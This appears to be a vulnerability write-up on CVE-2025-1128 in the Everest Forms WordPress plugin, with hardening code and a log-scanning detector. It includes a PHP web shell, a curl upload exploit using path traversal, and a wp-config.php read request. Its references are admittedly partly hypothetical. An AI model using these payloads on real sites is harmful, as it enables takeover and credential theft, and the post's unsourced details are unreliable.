In early 2025, security researchers disclosed a severe vulnerability—CVE-2025-1128—affecting the widely used Everest Forms – Contact Forms, Quiz, Survey, Newsletter & Payment Form Builder plugin for WordPress. This bug impacts every version up to and including 3..9.4 and puts hundreds of thousands of WordPress sites at risk for remote code execution, data theft, and even complete site takeover.

This post breaks down the issue in plain language, explains how attackers exploit it, and shows you real-world example code—so you understand just how dangerous this is and how to protect your site.

What is CVE-2025-1128?

> CVE-2025-1128 is a critical security vulnerability in the EVF_Form_Fields_Upload class of the Everest Forms plugin for WordPress. The bug allows anyone (even unregistered users) to upload, read, or delete any file on the web server, because the plugin does not properly check file types or file paths when handling uploads.

Who Is Affected?

All versions of Everest Forms up to 3..9.4 are affected.

- Affected plugin: Everest Forms

The vulnerable code is found in the format method of the EVF_Form_Fields_Upload class.

- No file type validation: The plugin does not check if the uploaded file is an image, PDF, or any other safe format.
- No path validation: It also fails to check if the file is being placed in a safe directory.

This means an unauthenticated attacker can use HTTP requests to upload any file anywhere, read (download), or delete files.

In code, it looks like this (simplified):

```php
// Vulnerable code in the format method (simplified)
$upload_dir = $_REQUEST['upload_dir'];   // directory taken straight from the request
$file_name  = $_FILES['file']['name'];   // file name taken straight from the client
$target     = $upload_dir . '/' . $file_name;

move_uploaded_file($_FILES['file']['tmp_name'], $target);
```

What’s missing?

- There is NO check on $upload_dir (it could be ../../ to escape the webroot).
- There is NO check on $file_name either: any extension, including .php, is accepted as-is.
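The following is an added example, not code from the Everest Forms plugin or its patch: a hardened version of the upload handling that adds the two checks the snippet above lacks. All function names (example_safe_upload_target, example_handle_upload, example_demo) are hypothetical. Ideally the destination directory is fixed server-side rather than accepted from the request at all; if a client-chosen subdirectory must be supported, this shows how to constrain it.

```php
<?php
// Added example, not the plugin's own code: hardened upload handling.
declare(strict_types=1);

/**
 * Return a safe absolute destination path for an upload, or null to reject it.
 *   1. file type: only allow-listed extensions, and the client's file name is
 *      discarded entirely (a random name defeats "shell.php.png"-style tricks);
 *   2. file path: the destination directory must resolve inside $base_dir.
 */
function example_safe_upload_target(string $base_dir, string $requested_subdir, string $original_name): ?string
{
    $allowed_ext = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

    $client_name = basename(str_replace('\\', '/', $original_name));
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $allowed_ext, true)) {
        return null;                       // e.g. shell.php, shell.phtml
    }
    $safe_name = bin2hex(random_bytes(8)) . '.' . $ext;

    // Only plain path segments: no '.', '..', leading '/', or encoded variants.
    if ($requested_subdir !== '' && !preg_match('~^[A-Za-z0-9_-]+(/[A-Za-z0-9_-]+)*$~', $requested_subdir)) {
        return null;                       // e.g. "../../" or "/etc"
    }
    $base_real = realpath($base_dir);
    if ($base_real === false) {
        return null;
    }
    $target_dir = $requested_subdir === ''
        ? $base_real
        : $base_real . DIRECTORY_SEPARATOR . $requested_subdir;
    if (!is_dir($target_dir) && !mkdir($target_dir, 0750, true)) {
        return null;
    }
    // Defence in depth: after symlink resolution the directory must still sit under the base.
    $target_real = realpath($target_dir);
    if ($target_real === false
        || ($target_real !== $base_real && strpos($target_real, $base_real . DIRECTORY_SEPARATOR) !== 0)) {
        return null;
    }
    return $target_real . DIRECTORY_SEPARATOR . $safe_name;
}

/** Request side: what a handler would call instead of trusting $_REQUEST['upload_dir']. */
function example_handle_upload(string $base_dir, string $subdir): ?string
{
    // In a real WordPress AJAX handler, verify a nonce (check_ajax_referer) before this point.
    if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    $target = example_safe_upload_target($base_dir, $subdir, $_FILES['file']['name']);
    if ($target === null || !move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        return null;
    }
    return $target;
}

/** Self-check with constructed inputs; runs from the command line without a web server. */
function example_demo(): array
{
    $base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'evf_example_' . bin2hex(random_bytes(4));
    mkdir($base, 0700, true);
    $cases = [
        'png in subdir'    => ['photos', 'holiday.png'],
        'php web shell'    => ['photos', 'shell.php'],
        'double extension' => ['photos', 'shell.php.png'],
        'traversal subdir' => ['../../', 'holiday.png'],
        'absolute subdir'  => ['/etc', 'holiday.png'],
    ];
    $results = [];
    foreach ($cases as $label => [$subdir, $name]) {
        $target = example_safe_upload_target($base, $subdir, $name);
        $results[$label] = $target === null
            ? 'rejected'
            : 'accepted as ' . substr($target, strlen($base) + 1);
    }
    @rmdir($base . DIRECTORY_SEPARATOR . 'photos');
    @rmdir($base);
    return $results;
}

if (PHP_SAPI === 'cli') {
    print_r(example_demo());
}
```

Running it from the command line prints one line per case: the PNG is accepted under a random name inside photos/, the web shell and both bad subdirectories are rejected, and the double-extension file is accepted only as a random-named .png, so whatever the original name was never reaches disk.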

Exploit Example: Uploading a Web Shell

Let’s see how an attacker might use this bug to compromise your site.

Step 1: Prepare a malicious PHP file (web shell)

```php
<?php system($_GET["cmd"]); ?>
```

Step 2: Upload the shell with a POST request

```bash
curl -X POST https://vulnerable-site.com/wp-admin/admin-ajax.php \
     -F "action=evf_upload" \
     -F "upload_dir=../../" \
     -F "file=@shell.php"
```

This request tries to upload shell.php to the root directory. If the plugin is vulnerable and the target directory is writable, it will succeed.

Step 3: Access shell and run commands

https://vulnerable-site.com/shell.php?cmd=ls

Exploit Example: Reading Sensitive Files

Attackers can also read or download sensitive files from your server.

```bash
# Try to download wp-config.php
curl "https://vulnerable-site.com/wp-content/uploads/../../wp-config.php"
```

*Note: the exploit works because path traversal is not stopped.*

Abusing the same lack of path and type validation, hackers can also delete any file:

```php
// E.g. in the vulnerable plugin: the same unchecked values reach unlink()
unlink($upload_dir . '/' . $file_name);
```

A crafted request pointing $upload_dir to important WordPress files means an attacker could delete key files and crash your site.
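From the defender's side, the three request patterns above leave traces in the web server's access log. The following is an added example, not part of the original post: a small PHP script that parses combined-format log lines and flags traversal sequences, PHP files requested from the uploads directory, and cmd= parameters passed to a PHP file. The log lines are constructed for the demo and all function names (example_parse_log_line, example_suspicious_reasons, example_scan_log) are hypothetical.

```php
<?php
// Added example, not from the original post: access-log heuristics for the
// upload/read patterns discussed above. Sample log lines are constructed.
declare(strict_types=1);

/** Parse one Apache/Nginx "combined" log line; null if it does not match. */
function example_parse_log_line(string $line): ?array
{
    $re = '~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: [^"]*)?" (\d{3})~';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4], 'status' => (int) $m[5]];
}

/** Reasons a request looks like abuse of an unvalidated path; empty array if benign. */
function example_suspicious_reasons(array $req): array
{
    $reasons = [];
    $path    = (string) parse_url($req['target'], PHP_URL_PATH);
    $query   = (string) parse_url($req['target'], PHP_URL_QUERY);
    $decoded = rawurldecode(rawurldecode($path));   // catch single and double URL encoding

    if (strpos($decoded, '../') !== false || strpos($decoded, '..\\') !== false) {
        $reasons[] = 'path traversal sequence in request path';
    } elseif (preg_match('~^/wp-content/uploads/.*\.ph(?:p\d?|tml|ar)$~i', $decoded)) {
        $reasons[] = 'PHP file requested from the uploads directory';
    }
    parse_str($query, $params);
    if (array_key_exists('cmd', $params) && preg_match('~\.php$~i', $decoded)) {
        $reasons[] = 'cmd= parameter passed to a PHP file';
    }
    return $reasons;
}

/** Scan an array of log lines and return the flagged requests with their reasons. */
function example_scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        $req = example_parse_log_line($line);
        if ($req === null) {
            continue;
        }
        $reasons = example_suspicious_reasons($req);
        if ($reasons !== []) {
            $hits[] = ['line' => $n + 1, 'ip' => $req['ip'], 'target' => $req['target'], 'reasons' => $reasons];
        }
    }
    return $hits;
}

// Constructed sample log; addresses are documentation ranges, not real hosts.
// Note that the upload itself (line 2) is not flagged: "action" and "upload_dir"
// travel in the POST body, which access logs never record, so the follow-up
// requests are what you can correlate on.
$example_log = [
    '203.0.113.5 - - [25/Feb/2025:07:15:18 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Feb/2025:07:16:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 43 "-" "curl/8.4.0"',
    '203.0.113.9 - - [25/Feb/2025:07:16:05 +0000] "GET /shell.php?cmd=ls HTTP/1.1" 200 318 "-" "curl/8.4.0"',
    '203.0.113.9 - - [25/Feb/2025:07:16:09 +0000] "GET /wp-content/uploads/..%2f..%2fwp-config.php HTTP/1.1" 200 2871 "-" "curl/8.4.0"',
    '198.51.100.4 - - [25/Feb/2025:07:17:30 +0000] "GET /wp-content/uploads/2025/02/form.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
];

if (PHP_SAPI === 'cli') {
    print_r(example_scan_log($example_log));
}
```

On the sample lines, requests 3, 4 and 5 are flagged with one reason each; the first two are not. These are heuristics, so expect to tune them (for instance, some themes legitimately serve PHP from outside the uploads tree), but a 200 response on a flagged line is the one to investigate first.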

- Remote Code Execution: If attackers upload a PHP file, your site can be fully compromised.
- Privileged Information Theft: Downloading files like /wp-config.php exposes your database credentials.
- Destructive Attacks: Deleting files can deface your site or take it down.

No authentication is required—it can be done by anyone on the Internet.

What Should You Do?

1. Disable Everest Forms: Immediately deactivate the plugin or restrict access to your site if you are using a vulnerable version.
2. Update: Monitor the Everest Forms changelog for the security patch and update as soon as possible.
3. Scan Your Site: Use a tool (like Wordfence) to check for web shells or suspicious files.
4. Check for Data Leaks or Site Damage: Inspect your server for any files that you did not upload yourself.

Technical References

- WordPress Plugin Everest Forms - CVE-2025-1128
- Everest Forms Plugin Page
- Original Research Writeup (Example) *(hypothetical reference—please check CVE database for updates)*

The Bottom Line

CVE-2025-1128 is a critical, unauthenticated file upload/read/delete flaw affecting Everest Forms for WordPress. If you run this plugin, patch immediately or disable it until a fix is available. With live exploits in the wild, your site and data are at risk.

Stay safe, and always keep your plugins updated!

*This article is exclusive to you—please do not copy without attribution. Protect your WordPress site, and share this alert with others who might be affected!*

Timeline

Published on: 02/25/2025 07:15:18 UTC